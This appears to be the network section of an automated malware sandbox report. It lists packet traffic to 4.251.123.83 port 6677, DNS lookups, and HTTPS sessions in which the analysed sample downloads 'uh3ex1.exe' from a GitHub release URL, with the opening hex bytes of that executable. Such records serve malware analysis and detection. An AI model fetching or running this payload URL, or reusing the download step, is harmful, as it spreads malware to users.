                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.952621937 CET497096677192.168.2.94.251.123.83
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.952682018 CET497096677192.168.2.94.251.123.83
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.952693939 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.952708960 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.952750921 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.952763081 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.952845097 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.952893972 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.952941895 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.952975988 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.953042030 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.953088045 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.953133106 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.953159094 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.953183889 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.953197956 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.953206062 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.953211069 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.953267097 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.953279018 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.953299046 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.953310966 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.953345060 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.953356981 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.953455925 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.953468084 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.953483105 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.953500986 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.953526020 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.953541040 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.953552008 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.953562975 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.953624964 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.953636885 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.953648090 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.953660011 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.953706026 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.953754902 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.953767061 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.953792095 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.953804016 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.953814983 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.953830957 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.953851938 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.953869104 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.953881025 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.953895092 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.953907013 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.953931093 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.953975916 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.957848072 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.957882881 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.957969904 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.957982063 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.957997084 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.958024025 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.958103895 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.958188057 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.958201885 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.958213091 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.958218098 CET497096677192.168.2.94.251.123.83
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.958239079 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.958307981 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.958329916 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.958340883 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.958453894 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.958477020 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.958488941 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.958537102 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.958636999 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.958710909 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.958722115 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.958739042 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.958765984 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.958776951 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.958808899 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.958857059 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.958869934 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.958883047 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.958934069 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.958946943 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.959008932 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.959022045 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.959084988 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.959096909 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.959109068 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.959136009 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.959177971 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.959191084 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.959264994 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.959279060 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.959290981 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.959393978 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.959404945 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.959415913 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.959430933 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.959441900 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.959486961 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.959527969 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.959541082 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.959566116 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.959580898 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.959592104 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.959639072 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.963305950 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.963334084 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.963346958 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.963360071 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.963440895 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.963500977 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.963512897 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.963522911 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.963606119 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.963692904 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.963710070 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.963764906 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.963777065 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.963788033 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.963803053 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:40.699707031 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:40.716346979 CET497096677192.168.2.94.251.123.83
                                                                                                                                                                                                                                              Nov 12, 2024 14:51:03.078735113 CET4970480192.168.2.9217.20.57.34
                                                                                                                                                                                                                                              Nov 12, 2024 14:51:03.084057093 CET8049704217.20.57.34192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:51:03.084117889 CET4970480192.168.2.9217.20.57.34
                                                                                                                                                                                                                                              Nov 12, 2024 14:51:43.562567949 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:51:43.563488960 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:51:43.563570023 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:51:43.564407110 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                              Nov 12, 2024 14:51:43.569228888 CET4434970613.107.246.45192.168.2.9

                                                                                                                                                                                                                                              UDP Packets

                                                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:24.421873093 CET5069653192.168.2.91.1.1.1
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:24.429701090 CET53506961.1.1.1192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:26.363835096 CET5491053192.168.2.91.1.1.1
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:26.370774031 CET53549101.1.1.1192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:36.807626009 CET53603191.1.1.1192.168.2.9

                                                                                                                                                                                                                                              DNS Queries

                                                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:24.421873093 CET192.168.2.91.1.1.10x422dStandard query (0)github.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:26.363835096 CET192.168.2.91.1.1.10x70cbStandard query (0)objects.githubusercontent.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                              DNS Answers

                                                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:24.429701090 CET1.1.1.1192.168.2.90x422dNo error (0)github.com140.82.121.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:26.370774031 CET1.1.1.1192.168.2.90x70cbNo error (0)objects.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:26.370774031 CET1.1.1.1192.168.2.90x70cbNo error (0)objects.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:26.370774031 CET1.1.1.1192.168.2.90x70cbNo error (0)objects.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:26.370774031 CET1.1.1.1192.168.2.90x70cbNo error (0)objects.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                              HTTP Request Dependency Graph

                                                                                                                                                                                                                                              • github.com
                                                                                                                                                                                                                                              • objects.githubusercontent.com

                                                                                                                                                                                                                                              HTTPS Proxied Packets

                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              0192.168.2.949707140.82.121.44437620C:\Users\user\Desktop\9LrEuTWP8s.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-12 13:50:25 UTC119OUTGET /Xavieprowel/crispy-palm-tree/releases/download/1/uh3ex1.exe HTTP/1.1
                                                                                                                                                                                                                                              Host: github.com
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              2024-11-12 13:50:26 UTC957INHTTP/1.1 302 Found
                                                                                                                                                                                                                                              Server: GitHub.com
                                                                                                                                                                                                                                              Date: Tue, 12 Nov 2024 13:50:26 GMT
                                                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                              Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                                                                                                              Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/882783246/b23a0dba-ce39-4346-b67f-261d78699733?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20241112%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20241112T135026Z&X-Amz-Expires=300&X-Amz-Signature=2c2918ad1c088c74e424c5e0842a55433a7fe7a314dfeedb12184bfb225b99f5&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Duh3ex1.exe&response-content-type=application%2Foctet-stream
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                                                                                                              X-Frame-Options: deny
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                              2024-11-12 13:50:26 UTC3380INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f
                                                                                                                                                                                                                                              Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              1192.168.2.949708185.199.111.1334437620C:\Users\user\Desktop\9LrEuTWP8s.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-12 13:50:26 UTC548OUTGET /github-production-release-asset-2e65be/882783246/b23a0dba-ce39-4346-b67f-261d78699733?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20241112%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20241112T135026Z&X-Amz-Expires=300&X-Amz-Signature=2c2918ad1c088c74e424c5e0842a55433a7fe7a314dfeedb12184bfb225b99f5&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Duh3ex1.exe&response-content-type=application%2Foctet-stream HTTP/1.1
                                                                                                                                                                                                                                              Host: objects.githubusercontent.com
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              2024-11-12 13:50:27 UTC842INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Length: 271360
                                                                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                                                                              Last-Modified: Mon, 04 Nov 2024 20:48:23 GMT
                                                                                                                                                                                                                                              ETag: "0x8DCFD1205FE7893"
                                                                                                                                                                                                                                              Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                              x-ms-request-id: d2615bf2-b01e-002f-12fb-2eec9e000000
                                                                                                                                                                                                                                              x-ms-version: 2024-08-04
                                                                                                                                                                                                                                              x-ms-creation-time: Mon, 04 Nov 2024 20:48:23 GMT
                                                                                                                                                                                                                                              x-ms-blob-content-md5: UMpJY0QgM2lYznNinZos9g==
                                                                                                                                                                                                                                              x-ms-lease-status: unlocked
                                                                                                                                                                                                                                              x-ms-lease-state: available
                                                                                                                                                                                                                                              x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                              Content-Disposition: attachment; filename=uh3ex1.exe
                                                                                                                                                                                                                                              x-ms-server-encrypted: true
                                                                                                                                                                                                                                              Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                                                                                                              Fastly-Restarts: 1
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              Age: 331
                                                                                                                                                                                                                                              Date: Tue, 12 Nov 2024 13:50:27 GMT
                                                                                                                                                                                                                                              X-Served-By: cache-iad-kiad7000059-IAD, cache-dfw-kdal2120032-DFW
                                                                                                                                                                                                                                              X-Cache: HIT, HIT
                                                                                                                                                                                                                                              X-Cache-Hits: 4, 0
                                                                                                                                                                                                                                              X-Timer: S1731419427.054764,VS0,VE38
                                                                                                                                                                                                                                              2024-11-12 13:50:27 UTC1378INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 d9 cc 23 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 18 04 00 00 0a 00 00 00 00 00 00 de 36 04 00 00 20 00 00 00 40 04 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 04 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL#g6 @@ @
                                                                                                                                                                                                                                              2024-11-12 13:50:27 UTC1378INData Raw: 92 ff b7 79 ef 9e ce 03 08 a4 4b de ac f1 ed 19 9e 5a 4f 3c 3a c8 2c 8f d6 52 f1 f7 d6 6b 80 d5 3d 1f fe b4 f4 f3 6e fd 3d ed 82 bb 94 8c 2c 0e 50 5d 77 03 ed e8 dc 38 ae af b9 da a1 32 9e 80 e4 2d 6b a7 d6 e7 55 dd 6c de 9a 69 9e 44 0f 63 3f 9a 27 cb 2f 0e 35 2d b5 99 fc f2 b4 9f a8 71 86 08 66 64 fb 5b 81 73 b9 46 36 30 a5 2a 03 59 01 6f 56 8c b0 86 3d 0b 64 5a 73 e4 6d 1b 56 a0 d8 17 d8 9d 78 b6 d3 56 7a 97 d9 87 4f b5 18 40 47 6f b6 db 1c a2 9a cb ee bb a6 64 8a db 40 0f c3 be 9f 6f 75 2b ca 34 b1 f1 ec 4e 9a 17 0c 06 c3 fb 43 70 ee db 9f ed 86 90 b0 30 44 4b 23 cc e9 d2 1a e0 00 e5 5d a2 15 dc 48 53 00 f1 8d b2 d4 43 a3 3a c5 83 9f 41 24 74 9b 9b f6 2d 4c d2 6b bc 0d a8 9b 66 9a e5 64 d7 ec b9 b2 3d 7a 6d 29 f7 05 ef e8 ee 6e cb d8 ec 81 19 0d 5d 6e
                                                                                                                                                                                                                                              Data Ascii: yKZO<:,Rk=n=,P]w82-kUliDc?'/5-qfd[sF60*YoV=dZsmVxVzO@God@ou+4NCp0DK#]HSC:A$t-Lkfd=zm)n]n
                                                                                                                                                                                                                                              2024-11-12 13:50:27 UTC1378INData Raw: 6c aa 9a 90 b5 26 5e 42 a4 e2 d3 eb 9a 02 58 18 29 dc b1 da 74 05 d8 f7 ac 4a f4 de 62 38 fd a0 4b c9 06 55 eb 04 0d fa 5c 89 3b 28 ff eb 8d cb 96 35 85 3a 66 79 c6 e7 70 04 1e b9 6f 1e c6 8e 58 8e 22 30 ee eb 03 35 c2 0f 26 d7 2e 7a fb 07 8c ff 8d fd 40 66 fa 18 77 80 e8 05 8c 44 cd 01 3e f8 47 46 7b 51 ef 47 6d 92 b0 ea ce df d5 a9 39 db 6b 2f 6e f3 df ef 74 19 e3 5b 99 86 73 d0 b4 46 00 05 72 ff 0d 1b 1a 6e c0 b7 e4 87 15 22 12 14 99 85 e9 23 28 e3 16 56 2c fb 34 a3 9f c6 ca 5d 47 64 3b 28 1e a3 34 50 64 12 c0 c8 d8 a0 8e 45 00 92 8e 3c 53 d3 e1 73 07 52 01 8e 0e ae 68 74 96 47 9a c3 ea d0 ea 37 16 83 c4 d9 36 9a 77 87 2e 59 60 ff 28 47 f3 31 e6 37 f5 a5 07 87 79 0a 5e 38 64 87 4c 67 00 4c 4f 30 b8 f2 65 71 de dd c2 88 0a 69 a6 cf 16 bc ea b2 c2 e0 86
                                                                                                                                                                                                                                              Data Ascii: l&^BX)tJb8KU\;(5:fypoX"05&.z@fwD>GF{QGm9k/nt[sFrn"#(V,4]Gd;(4PdE<SsRhtG76w.Y`(G17y^8dLgLO0eqi
                                                                                                                                                                                                                                              2024-11-12 13:50:27 UTC1378INData Raw: 4f d3 db ec f5 eb b7 45 f1 a4 b5 ef d2 25 b8 5f 52 3a a0 97 52 2d 01 aa ec bc 25 2d 85 db f2 0e 9c 53 d1 58 9e d8 25 1c 16 e9 4f c2 11 b7 9b 6a 25 67 99 98 40 b5 11 23 0c 12 5b 01 c9 2a a5 c2 b8 7b 49 5b 33 47 4a 60 b8 ba 9a f6 33 5c 53 d8 b1 b6 81 3c b8 fc 8a 68 e6 cc c8 db 6e a2 da 14 d6 05 87 2e 7c bb c9 9a 0d 2c f6 15 95 97 82 52 4e 5b c6 2e 6c ec 9b 57 86 e6 fd f0 0f 7b e0 e6 14 1e 84 0a e8 bc c2 ee e8 ac a1 35 64 f5 05 e0 36 35 12 de ac 61 71 82 fb e7 af f2 0a 5a 5e ce 1c 40 db d0 2b 51 a3 46 4f aa 1d 7a 26 6e 5d 8f 2b 40 04 82 24 89 43 25 60 a7 01 4e d9 cc 4b 73 24 12 48 40 ae d0 1e a3 20 41 1b 4f 98 82 8b ef f8 4f 96 2b 2c 51 75 0d 87 2f 7a 29 ad 96 50 43 84 86 b3 80 f2 01 d7 cb 40 43 12 75 3f d5 f5 9c 4b 75 0d 44 2a 1d 95 3c 83 68 de 60 b8 21 1e
                                                                                                                                                                                                                                              Data Ascii: OE%_R:R-%-SX%Oj%g@#[*{I[3GJ`3\S<hn.|,RN[.lW{5d65aqZ^@+QFOz&n]+@$C%`NKs$H@ AOO+,Qu/z)PC@Cu?KuD*<h`!
